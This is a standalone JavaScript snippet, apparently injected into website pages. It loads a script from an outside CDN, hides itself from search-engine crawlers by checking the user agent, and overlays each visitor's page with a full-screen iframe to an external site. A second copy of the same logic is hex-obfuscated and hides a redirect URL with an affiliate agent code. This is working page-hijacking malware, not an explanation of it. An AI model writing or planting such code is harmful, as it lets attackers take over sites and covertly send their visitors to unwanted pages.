(function(){
var src = "//cdn.bb126.com/js/bjm.js";
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();





var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i;
if (!reg.test(navigator.userAgent)) {
let flag = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if (flag) {
//k
_src = '//cdn.bb126.com/js/mobile.php'
} else {
// PC
_src = '//cdn.bb126.com/404/'
}
document.write('<meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1">');
var hd = document.head;
var styleCSS = document.createElement('style'), yabo = document.createElement('div');
styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}';
yabo.setAttribute('class', 'yabo');
yabo.innerHTML = '<iframe src='+ _src +' frameborder="0" style="position:fixed;top:0;left:0;width:100% !important;height:100% !important;max-height: none !important;"></iframe>';
hd.appendChild(styleCSS);
hd.parentNode.appendChild(yabo);
}











var b_h$O1=/(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i;if(!b_h$O1['\x74\x65\x73\x74'](navigator['\x75\x73\x65\x72\x41\x67\x65\x6e\x74'])){let flag=navigator['\x75\x73\x65\x72\x41\x67\x65\x6e\x74']['\x6d\x61\x74\x63\x68'](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);if(flag){_src='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x72\x32\x32\x35\x2e\x63\x6f\x6d\x3a\x39\x39\x30\x30\x2f\x3f\x61\x67\x65\x6e\x74\x5f\x63\x6f\x64\x65\x3d\x36\x33\x34\x32\x38\x39\x32'}else{_src='\x2f\x34\x30\x34\x2f'}window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x77\x72\x69\x74\x65']('\x3c\x6d\x65\x74\x61 \x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76\x3d\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65 \x63\x6f\x6e\x74\x65\x6e\x74\x3d\x22\x49\x45\x3d\x65\x64\x67\x65\x22\x3e\x3c\x6d\x65\x74\x61 \x6e\x61\x6d\x65\x3d\x76\x69\x65\x77\x70\x6f\x72\x74 \x63\x6f\x6e\x74\x65\x6e\x74\x3d\x22\x77\x69\x64\x74\x68\x3d\x64\x65\x76\x69\x63\x65\x2d\x77\x69\x64\x74\x68\x2c\x69\x6e\x69\x74\x69\x61\x6c\x2d\x73\x63\x61\x6c\x65\x3d\x31\x22\x3e');var wGztMFUm2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x68\x65\x61\x64'];var NeR3=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x73\x74\x79\x6c\x65'),JJDMwg4=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x64\x69\x76');NeR3['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x68\x74\x6d\x6c\x2c\x62\x6f\x64\x79\x7b\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x72\x65\x6c\x61\x74\x69\x76\x65\x3b\x77\x69\x64\x74\x68\x3a\x61\x75\x74\x6f \x21\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x3b\x68\x65\x69\x67\x68\x74\x3a\x31\x30\x30\x25 \x21\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x3b\x6d\x69\x6e\x2d\x77\x69\x64\x74\x68\x3a\x61\x75\x74\x6f \x21\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x3b\x6f\x76\x65\x72\x66\x6c\x6f\x77\x3a\x68\x69\x64\x64\x65\x6e\x3b\x7d\x2e\x79\x61\x62\x6f\x7b\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x66\x69\x78\x65\x64\x3b\x74\x6f\x70\x3a\x30\x3b\x6c\x65\x66\x74\x3a\x30\x3b\x72\x69\x67\x68\x74\x3a\x30\x3b\x68\x65\x69\x67\x68\x74\x3a\x31\x30\x30\x25\x3b\x7a\x2d\x69\x6e\x64\x65\x78\x3a\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x3b\x62\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x3a\x23\x66\x66\x66\x3b\x7d';JJDMwg4['\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65']('\x63\x6c\x61\x73\x73','\x79\x61\x62\x6f');JJDMwg4['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d'+_src+' \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x22\x30\x22 \x73\x74\x79\x6c\x65\x3d\x22\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x66\x69\x78\x65\x64\x3b\x74\x6f\x70\x3a\x30\x3b\x6c\x65\x66\x74\x3a\x30\x3b\x77\x69\x64\x74\x68\x3a\x31\x30\x30\x25 \x21\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x3b\x68\x65\x69\x67\x68\x74\x3a\x31\x30\x30\x25 \x21\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x3b\x6d\x61\x78\x2d\x68\x65\x69\x67\x68\x74\x3a \x6e\x6f\x6e\x65 \x21\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x3b\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e';wGztMFUm2['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](NeR3);wGztMFUm2['\x70\x61\x72\x65\x6e\x74\x4e\x6f\x64\x65']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](JJDMwg4)}